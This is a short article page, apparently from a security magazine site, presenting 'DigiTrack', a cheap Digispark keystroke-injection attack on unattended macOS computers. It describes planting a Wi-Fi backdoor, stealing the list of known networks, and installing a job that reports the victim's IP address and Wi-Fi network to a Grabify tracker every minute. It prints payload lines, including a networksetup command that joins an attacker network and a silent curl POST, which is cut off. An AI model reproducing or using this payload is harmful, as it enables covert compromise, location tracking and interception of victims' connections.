DigiTrack - Attacks for $5 or less using Arduino

April 3, 2020
(98 views)

DigiTrack - In 30 seconds, this attack can learn which networks a MacOS computer has connected to before, and plant a script that tracks the current IP address and Wi-Fi network every 60 seconds. 

Now includes Hardtracker - Digispark VPN buster to send the IP address and BSSID/SSID of nearby Wi-Fi networks on a MacOS computer to a Grabify tracker every 60 seconds.

This is a $5 attack that does a couple of things:

  1. Inserts a Wi-Fi backdoor onto a victim computer, allowing you to capture the victim's data connection at any time when you are in Wi-Fi range.
  2. Steals a list of every network the victim has ever connected to (for tracking, classifying, and hijacking data connection)
  3. Inserts a tracking job that sends the IP address and currently connected network to a Grabify link every 60 seconds.

The attack DigiTrack goes: A victim leaves a MacOS computer unattended for 30 seconds. The attacker inserts a DigiSpark board loaded with an attack payload. The payload looks like this (with delays and single keystrokes removed):

DigiKeyboard.print("networksetup -setairportnetwork en0 'sneakernet' 00000000");
  • We add the network "Sneakernet" to our trusted network list and connect to it.
DigiKeyboard.print("curl -m 10 --silent --output /dev/null -X POST -H "Content-Type:....

Subscribe
Notify of
guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

0 Comments
Inline Feedbacks
View all comments
© HAKIN9 MEDIA SP. Z O.O. SP. K. 2023
What certifications or qualifications do you hold?
Max. file size: 150 MB.

What level of experience should the ideal candidate have?
What certifications or qualifications are preferred?

Download Free eBook

Step 1 of 4

Name(Required)

We’re committed to your privacy. Hakin9 uses the information you provide to us to contact you about our relevant content, products, and services. You may unsubscribe from these communications at any time. For more information, check out our Privacy Policy.